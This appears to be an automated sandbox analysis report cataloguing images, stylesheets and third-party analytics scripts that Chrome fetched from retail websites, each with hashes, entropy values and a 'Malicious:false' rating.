                                                                                                                                                                                    Preview:......JFIF..............................................................................!................................................................!..........."..........9......................................................................Vl..f..:)/|.69.?..1...d.~_.....d.).b..........:....kW[T..?F....jE.CR.>f....6.......]X.q.L..K.h?g.Ro....>Qe..............#,.{&9..2.VF.\./............*.@N.X^.3......i., .t..h..X.o=.~~....)..u.k..b...`b...M.x...M.....O..ct<.owFX...Q.....B7..b.....-..t...^Y......W.h*.S..O0....I..O-..*X+.X..Z..RF..I.-...t..C....7...2S.T.E....T.....%.y...;..J.........F....S......&.C.W....j9..<...o...P.Y...T.....J..Z...9.US.].<..u%...i..p._.W...@0....TF..I.H.;...aB..cmh.Q[.'.Y#)r....v8..9Lt....;/T.CI.c..M....;U.........<..-..>F...D...{..1O`.;&.\CNH..V^:.7..4..y.0S.....b....BH..T.Z..^....#..n.h.A......&........g.R..<...v\.8)...Yg.......v.1.r..%..pc.O@.V....u..+.4?W......X;%%..D..L.NM.&.5:^.K.o..?O..h<..j.....Y.9.C.w.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1390)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1502
                                                                                                                                                                                    Entropy (8bit):5.044388362802039
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:9P8VuEeuPAPrb/IszIbU0sfqszGmtnebszm0AWTx0X7zJuIxN6fvi08:9PMjmBzjDzGmEgzmnBJxNiv58
                                                                                                                                                                                    MD5:567A46BB63CC42325FC95836DDCD9486
                                                                                                                                                                                    SHA1:5AB1D252400C8CAF3FCC4FBF7397C37792D69C8D
                                                                                                                                                                                    SHA-256:0F56FDCCE8AC9C3B4042AA76CFC756DF9CC7D747749F6AEFD43AF30717DD73D9
                                                                                                                                                                                    SHA-512:143AA8718211D0694719398E22EE995AC89131785896524D3ECB467B925E068C3E8F422E6814A88441F6D60CEBAF8B392210E024B2C25EF0378F990010F7E825
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/navigation-mega-columns.css?v=62327496828350225961730157903
                                                                                                                                                                                    Preview:.badge{display:inline-flex;position:relative;top:-2px;align-items:center;margin:-.6em 0;padding:.6em .9em;border-radius:2em;background:rgb(var(--text-color));color:rgba(var(--bg-color));font-size:1rem;font-weight:700;line-height:1rem;white-space:nowrap}@media (max-width: 1050.98px){.main-nav__badge{display:none}}@media (min-width: 1051px){.main-nav__badge--1{background-color:rgba(var(--badge-1-color)/.1);color:rgb(var(--badge-1-color))}.main-nav__badge--2{background-color:rgba(var(--badge-2-color)/.1);color:rgb(var(--badge-2-color))}.main-nav__badge--3{background-color:rgba(var(--badge-3-color)/.1);color:rgb(var(--badge-3-color))}.mega-nav--columns .main-nav__item--go{display:none}.mega-nav--columns .child-nav__item,.mega-nav--columns .main-nav__grandchild{padding-right:0;padding-left:0}.mega-nav--columns .child-nav__collection-image{min-height:54px}.mega-nav--columns .child-nav__item--toggle:not(.nav__item--no-underline){margin-bottom:calc(2 * var(--space-unit));border-bottom:1px soli
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1400x150, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):11642
                                                                                                                                                                                    Entropy (8bit):7.98307000118264
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:Gd7I9qmEC3CQlY8/V+vxz4p66nVX3/P786I+ujZiFOLwNK0Idwr/oZLpdZROSOf1:Gd7IkCRKC+94nRvPo6IVjZiFq30IK6La
                                                                                                                                                                                    MD5:E01FD62EF4447A29B5804BE3C7115EFB
                                                                                                                                                                                    SHA1:1693EB615877CEEE943B64B87AB98438101E7FCD
                                                                                                                                                                                    SHA-256:7684DEE592CBA6C50B5DF2634395137331B0258F8BC5C64C903EEFFA1F096AB1
                                                                                                                                                                                    SHA-512:B1BC287A73469E06658D96A6FD02E64CACF2D3F5C30D53CB0083F5273282BD3994A4A063128DAC1572C7E07DDFBD854A913F376C31CE133A800A985474DEB862
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10072024-MOPS-HP-1400x150_InfoBanner_Desktop.jpg?imwidth=1920
                                                                                                                                                                                    Preview:RIFFr-..WEBPVP8 f-..p^...*x...?.z.Q.(:...k.P!.M.{.4s.|W..n.W.....}...\.p.....WJ.t.9./R-y.....YUz........%.^.}...7....:@.f....wu....:o;b...x-.T.%..).$..!..Q<....../(..N.B-....k$f%!..;.<..r^..l':%'.%.....t.p.?.z...[..q$).L/...n.<...q.P.\..[.[...e...'.O.8.*.$s...a..=.Ak.Kq...._.\...I._.8..{K.....&y..5...Q...........h.P.........B..R.5.k.....m.@j.........?N.(@t.F.H....x.8..R.....'q..:.&9.W..8..%>D..r..............7A/.G....t..@....1G.p.<...5.j.. .r.K.F.r.fq...*.....^&...P]....#.@P..F."l!.2.K.8po@..e".;{D.>...3.Sb.y....U77..?p[..o.;.CJ....8..=6.7.).L..G..dO`N....Y..C.x.5..X.;!.d..$.......wc.b.l.A% d^.f.c.9.VI..'B+e...3.R..[m......1....\.........hz.5..Q(.-[I.....N...@b...J.~.@A..X.Z.8`...N....9m.....F..QI....g.<..6.Ilv|X!.N...r.!I.[|...V.2...)....;2.oP.3.0.M.Wq.q9..U..N..v(.T........j..Q.b.......G.#...d.[.......I.A..9.H.6.._.$O...G....P.......6i.Jn..U.j.......BO.a..6+.....t.p....DvJ.......J..^...P:.X.*.TM,..R~..}..v....4..G..KH36UN...X
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1582
                                                                                                                                                                                    Entropy (8bit):6.781074912823952
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:cIl/XflLlSs8M4zoLXcOTMZImNmOBggz:cIl/XFxwoLgHNmOB/z
                                                                                                                                                                                    MD5:4142043D153158C9F05EDADBC803F66C
                                                                                                                                                                                    SHA1:57336AC33C6BD977F32D09CD89266F2D0F88B75F
                                                                                                                                                                                    SHA-256:5EC13E13C82B620D3DB35412B90F6A12D4F4BD674D0A4EBBA04FCD38B098D28F
                                                                                                                                                                                    SHA-512:A262E62BD3D22DBE74E49C8F9F289DE15666E7CD0063B623303F5B439035853E92454ECD47E3AA9FB81BFD63D57DB83479D5615EEB40781C844174D049C266A5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_1258f9b1-df4c-4cbc-9fec-dd12a1ace1b4.jpg?v=1729325105&width=80
                                                                                                                                                                                    Preview:RIFF&...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>-..B...f2...bY.3.....F........_B;h5,..........[..Q.....s......-..Mu.DH.#.`..;V.4..{..l6@.V+Q.yAx.iW5.YtV@[cc.6..q.c....#..oV..RV.`.?......!C..f....y...L..O...G{N...ju...pV..b89.+w..U.N......0.*.r....H....~....e...h....r.Z6.ao..v.&..10...s_..3..........{%.d..T$k.........K.B3yG0N?.R.4..dU..............Q1......3Qb09......,.}......W...K.....G...H-gG.....T....9..,Yh..=...n....T.....j...6.s.1.,..n.FW.........\A.^(.10...*.x....Y...~...A4a..^.e..8t.Y@t.UQ.fi.D.Kh.S..b .5j.....K... .....?.......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):345493
                                                                                                                                                                                    Entropy (8bit):5.606595058163335
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:l4h1GbgBucouk2639cM8Gp/J2/rtu9BW24nO1:+hacucounrAE0
                                                                                                                                                                                    MD5:5610EEE045829E1E58DECCCDF762BFE8
                                                                                                                                                                                    SHA1:B88FD69FDB3BDDA09F067424A8C3061EC697459D
                                                                                                                                                                                    SHA-256:26D91155C7E19CED1AFBDC19BD213E0E296E7AF968792CAA1B9872674296242D
                                                                                                                                                                                    SHA-512:3ACA719CA259A87FA7216F42806C767B2D27CAA1FBF687F91320F41A5235FFABD122FF4F6858356831CC26EC2F248DA651B9233D73E7B4BE48600D6BBA88686B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtag/js?id=G-8MPQ3CZZFH&l=dataLayer&cx=c
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"7",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":25,"tag_id":111},{"function":"__ogt_ip_mark","priority":15,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":106},{"function":"__ogt_referral_exclusion","priority":15,"vtp_includeConditions":["list","overstock\\.com","paypal\\.com","ampproject","testing","staging","mrqa","sandbox","atlassian","dev","myshopify","tagassistant","mrbhargav","myregistrystaging"],"tag_id":108},{"function":"__ogt_dma","priority":15,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":109},{"function":"__ogt_1p_data_v2","priority":15,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityTy
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4702)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7103
                                                                                                                                                                                    Entropy (8bit):5.439030818207447
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:4Udkvq7r98XELtjwS7g7+zVISERzIuktX9YLAKzD7erl3JKuM:5CqV8OtLEg+ZmX9GAAyrlZY
                                                                                                                                                                                    MD5:7A40122E68271E18E5FA4DD01C8B004B
                                                                                                                                                                                    SHA1:EECE84A69B27171FAC74473344BD396A771D8EF1
                                                                                                                                                                                    SHA-256:576E53B45AD69671CF21D18D26CA905CF13E33EEEC23BD69AF58C5383B38DF4E
                                                                                                                                                                                    SHA-512:CB8F601034E4281F35070ED5DF16FB50FB8AA1B98CF7A8C99448E12F6D2476BB22AA68AA919C853E65F83F8AFF6914570AF0BF17438A26AA0D00F87213CAC1E4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/page-triggers.172.chunk.576e53b45ad69671cf21d18d26ca905cf13e33eeec23bd69af58c5383b38df4e.js
                                                                                                                                                                                    Preview:(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[172],{7154:function(e){function t(){return e.exports=t=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},e.exports.__esModule=!0,e.exports.default=e.exports,t.apply(this,arguments)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports},6479:function(e,t,r){var n=r(7316);e.exports=function(e,t){if(null==e)return{};var r,i,o=n(e,t);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);for(i=0;i<a.length;i++)r=a[i],t.indexOf(r)>=0||Object.prototype.propertyIsEnumerable.call(e,r)&&(o[r]=e[r])}return o},e.exports.__esModule=!0,e.exports.default=e.exports},7316:function(e){e.exports=function(e,t){if(null==e)return{};var r,n,i={},o=Object.keys(e);for(n=0;n<o.length;n++)r=o[n],t.indexOf(r)>=0||(i[r]=e[r]);return i},e.exports.__esModule=!0,e.exports.default=e.exports},2543:function(e,
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):21
                                                                                                                                                                                    Entropy (8bit):4.011365041826379
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:JSPKArOw:UK2
                                                                                                                                                                                    MD5:9F04282C5B3ECCA33E725626F894BFD5
                                                                                                                                                                                    SHA1:99CA782476CB7BFD553803F5BE308B090B096E3B
                                                                                                                                                                                    SHA-256:D366CB845818CB63FBA9D91C87D085CE44B2E6D7339B8CF30ADED4FA4EFA7EE9
                                                                                                                                                                                    SHA-512:5FED53394233BAE105AFFCEA2E34D2018168329DB8DCA4D152AA7429E0216E07B785B5AEC9A0298164DAA840D2558B64F8D402385159028759FFD4591652F606
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://unpkg.com/tapcart-capture-kit@0.3.0/dist/tc-plugins.es.js
                                                                                                                                                                                    Preview:import "./embed.js";.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (27377)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):27592
                                                                                                                                                                                    Entropy (8bit):4.83669575258768
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:Euwu4Eyfd7PNRzAmReUtPAM0NuzwpmnWt:ETuqdNReUtPAM0v4E
                                                                                                                                                                                    MD5:5E5B0D8C7BE5919570A305B6BC229A36
                                                                                                                                                                                    SHA1:E4AB3A85D3AB0A8654A278D954FB310906526DB3
                                                                                                                                                                                    SHA-256:1AE3C19265723696F50E3226DCD43FBC7EA617697E0D7169A8E52C854AE3826C
                                                                                                                                                                                    SHA-512:7FB88208B7D2E585F6C2B49BAF85AEF8D374A1C3F565596B50FFE49F2B5B6B5E1B39DADFCCC0E9971000346957551DA6316A911CDEED502B1983EB1598F37D62
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa.fa-glass:before{content:"\f000"}.fa.fa-envelope-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-envelope-o:before{content:"\f0e0"}.fa.fa-star-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-home:before{content:"\f015"}.fa.fa-file-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-arrow-circle-o-dow
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (40455)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):40532
                                                                                                                                                                                    Entropy (8bit):5.39831659265177
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:sFmkuGgWzWxZTWLbAwHfJLnmITcGS5Y2xnCZqCYm:dkrgWKHqLkwtnPQGS5dnkmm
                                                                                                                                                                                    MD5:D57FA8D12FCB57E7DA82519D6EF0F2B5
                                                                                                                                                                                    SHA1:9A966866655E2C061F52D33D7498DE975114F948
                                                                                                                                                                                    SHA-256:8A328317E49399C202F9AC73B9D8694B9A6B126CDB283C6A3105D0F168B47050
                                                                                                                                                                                    SHA-512:CB4781FD73E2327A763A5CBE34DC99F3E281A150F41227A1D93F2DBE5010F5DDCEC9AC0E55E2AD6237640C086CAF03B56FA399883DBBD67205A62EE54278EADA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */(()=>{var t,e,r,n,o={58332:(t,e,r)=>{"use strict";r.d(e,{m:()=>f});var n=r(47408),o=r.n(n),i="[[PowerreviewsGlobalObject]]";function a(t){return window[i][t]}function s(t,e){try{o()(window[i],t,{configurable:!1,enumerable:!1,writable:!1,value:e})}catch(t){0}}window.hasOwnProperty(i)||o()(window,i,{configurable:!1,enumerable:!1,writable:!1,value:{}});var c="@@init",u="stable(10461)";var f={getItem:a,setItem:s,setItemVolatile:function(t,e){window[i][t]=e},initialize:function(){s("version","4.1"),s("buildVersion","10461"),s(c,u)},get isInitialized(){return a(c)===u}}},6224:(t,e,r)=>{r(66803);var n=r(10988).Object,o=t.exports=function(t,e,r){return n.defineProperty(t,e,r)};n.defineProperty.sham&&(o.sham=!0)},88600:(t,e,r)=>{r(4148),r(37708),r(99220),r(64728),r(94196),r(27660),r(31632),r(86088);var n=r(10988);t.exports=n.Promise},89648:(t,e,r)=>{var n=r(71980),o=r(61052),i=TypeError;t.exports=function(t){if(n(t))
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1489)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):210833
                                                                                                                                                                                    Entropy (8bit):5.494126945983759
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:8oat+KbTz+tOyPIvqYsfIRqOSgwOpP3kpQx8l0stdZ/I:8cAyySFysd/I
                                                                                                                                                                                    MD5:D86EC6E8CF19DC7EE57DDC71ED1A5ADF
                                                                                                                                                                                    SHA1:730A172232C5B0A83D733B2B7FD0440BA3FB206A
                                                                                                                                                                                    SHA-256:A5C41349086521A1E7D8861AF57F8F2F83921A76B45EE33894CFC16B6C279F6F
                                                                                                                                                                                    SHA-512:0DEB15ADA2CFAB8C81BED1995D485FD70C0583DA74B8642110777726FE837D642CB28EA1E067ADA80A08B88820183FDE01C2556C2C7FB1B5E1663E72C188C5A3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*.* Braze Web SDK v5.1.1.* (c) Braze, Inc. 2024 - http://braze.com.* License available at https://github.com/braze-inc/braze-web-sdk/blob/master/LICENSE.* Compiled on 2024-02-13.*/.(function(){(function(b,a){if("function"===typeof define&&define.amd)define([],a);else if("object"===typeof module&&module.exports){var e = a();module.exports=e;module.exports.default=e}else if(b.braze){var d=a(),c;for(c in d)b.braze[c]=d[c]}else b.braze=a()})("undefined"!==typeof self?self:this,function(){var brazeInterface={};var n;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}function r(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if("number"==typeof a.length)return{next:aa(a)};throw Error(String(a)+" is not an iterable or ArrayLike");}function ca(a){if(!(a instanceof Array)){a=r(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a}.var da="function"==typeof Object.create?Object.create:function(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (723)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7076
                                                                                                                                                                                    Entropy (8bit):5.52488676121649
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:bttd4a6O1T6ahNU3dJ+SrM0hjUYIW2WX8ISlY:bBJ1T9UNJ+SrM0lXV2WXXSlY
                                                                                                                                                                                    MD5:88A2E0A522036C0B87E03552E56629AA
                                                                                                                                                                                    SHA1:EC9D1157518E753A84DBDE1333A29B34CF776D63
                                                                                                                                                                                    SHA-256:788AFB96F2DA68E8729EC35F3D5E381FAD3482D37C54C2195C7311440EE4C27E
                                                                                                                                                                                    SHA-512:44B953878BD650FE2BCC8B6904620955C3E396B7DC8F41F85D021A8E0404DA41DB15C5499A03F7D4FE9129BB340AA3F6782942CF5327502FD4569BEBBB17073F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.googletagmanager.com/static/service_worker/4al0/sw.js?origin=https%3A%2F%2Fwww.bedbathandbeyond.com
                                                                                                                                                                                    Preview:'use strict';var k=function(a){function b(c){return a.next(c)}function e(c){return a.throw(c)}return new Promise(function(c,d){function f(h){h.done?c(h.value):Promise.resolve(h.value).then(b,e).then(f,d)}f(a.next())})};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;var u,v;a:{for(var x=["CLOSURE_FLAGS"],B=m,C=0;C<x.length;C++)if(B=B[x[C]],B==null){v=null;break a}v=B}var G=v&&v[610401301];u=G!=null?G:!1;var H;const I=m.navigator;H=I?I.userAgentData||null:null;function J(a){return u?H?H.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function K(a){var b;a:{const e=m.navigator;if(e){const c=e.userAgent;if(c){b=c;break a}}b=""}return b.indexOf(a)!=-1};function L(){return u?!!H&&H.brands.length>0:!1}function O(){return L()?J("Chromium"):(K("Chrome")||K("CriOS"))&&!(L()?0:K("Edge"))||K("Silk")};!K("Android")||O();O();!K("Safari")||O()||(L()?0:K("Coast"))||(L()?0:K("Opera"))||(L()?0:K("Edge"))||(L()?J("Microsoft Edge"):K("Edg/"))||L()&
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1506
                                                                                                                                                                                    Entropy (8bit):6.130454019292416
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZgErc0TnDnDU0xHeQHuPQjdnAJEeqyHkNkmh3:NBIl/XflVxeExTnLDtxH/pnikNkW3
                                                                                                                                                                                    MD5:BE85DD7AF416B3E7EA6F6A4123386CB6
                                                                                                                                                                                    SHA1:944B615F3C95FF75FCE1FB8DAA82A76C57E780CA
                                                                                                                                                                                    SHA-256:2DAC823BE0042421ACF3401F0EE309A496310F79482AF11F7C9A8A4C9A79DF69
                                                                                                                                                                                    SHA-512:1F6D32B43EA0472C7B7F3499F3CDCF3B706D60CA94DFC71F1B6663ACDA7BED659C2617DF2CB78CB575F56580032ECBBF1809FE8E89A743EB4F92293483F41401
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..........................................................................,...........!HP@Py.8..fO...y.........Y.D)@!@..)H............3.......................!1.."A2BQaq...@.....#RSb..........?..pk...NK........R.l~xd.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:C source, ASCII text, with very long lines (50719)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):51014
                                                                                                                                                                                    Entropy (8bit):5.227893953210577
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:eU/u1oWnkxzKhWdBY2rJxgCrMZ45dJ+KIAlj6cizBzzJpUVstotL:Z/+3nsflM6IAV6yRtL
                                                                                                                                                                                    MD5:C187B684E58EEED09BFD813740AA2C9D
                                                                                                                                                                                    SHA1:994F80424D6FFFDAD04E7623CC2A9F966C07F5F4
                                                                                                                                                                                    SHA-256:444D5ED8666CF861B4380F713C3EE88C3C629107562AC5044C2936F47A1C72ED
                                                                                                                                                                                    SHA-512:240181C621779E795C5BC4A6E4C36EDED7C0BA258086F364903C21884F654F6302A83BDF6A40E8FAA8AC9AADB25BB7F9F0193C5C76A3FCB1226468EA6A77EC84
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://dynamic.criteo.com/js/ld/ld.js?a=2364
                                                                                                                                                                                    Preview:window.Criteo=window.Criteo||{};window.Criteo.oneTagConfig={partnerId:2364,visitEventEnabled:true,fpIdentifier:undefined,dynamic:!0,gumDomain:"gum.criteo.com",privateModeDetectionEnabled:true,blockedSteps:[],addClientSideSupportForId5:false,shouldFillPageId:false,enableOffsiteProjection:true};.!function(){"use strict";function v(e,t){var n=null==(n=window.Criteo)?void 0:n.oneTagConfig;return null!=(n=n&&n[e])?n:t}var I,T="5.29.0",u=((P=I=I||{})[P.None=0]="None",P[P.Cookie=1]="Cookie",P[P.LocalStorage=2]="LocalStorage",P[P.Library=3]="Library",o.checkLocalStorageIsWritable=function(){try{var e;return window.localStorage?(e="criteo_localstorage_check",window.localStorage.setItem(e,e),window.localStorage.removeItem(e),!0):!1}catch(e){return!1}},o.checkCookiesAreWritable=function(){var e=new o("criteo_write_test",1e4),t=(e.setValueWithNoDomain("1"),"1"===e.cookieValue);return e.removeWithNoDomain(),t},o.prototype.setCookieRead=function(){this.isCookieRead=!0},o.prototype.setValue=function(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (7311), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7311
                                                                                                                                                                                    Entropy (8bit):5.667586842040121
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:yZyxgWcq8Bb/BhzBNYBgeB4kBKEB1qB3DKnBmIQBIZlBuFB+GBT9BnyBb3:y4xgWcq89/PzHYWe2kwEvqFKnEIQe3gm
                                                                                                                                                                                    MD5:4D629A6EC6211B55C78C2D0F316F869D
                                                                                                                                                                                    SHA1:4DA9ABAA81018328E5CAFB6685D002021658BC79
                                                                                                                                                                                    SHA-256:E90D15090CF31BCA826D0455A591392E59A31E0313F5C0EE4E67214FBE7A9B0B
                                                                                                                                                                                    SHA-512:AB1C05C2C99EE862481FA6915170F60E6DF7E59D41DF13D6D78AC8D93307A64B5DB10817FDBEEE288AACC1B56EE85AC2E5722D0B5261B7C5F3C0E7D3CE610E2F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
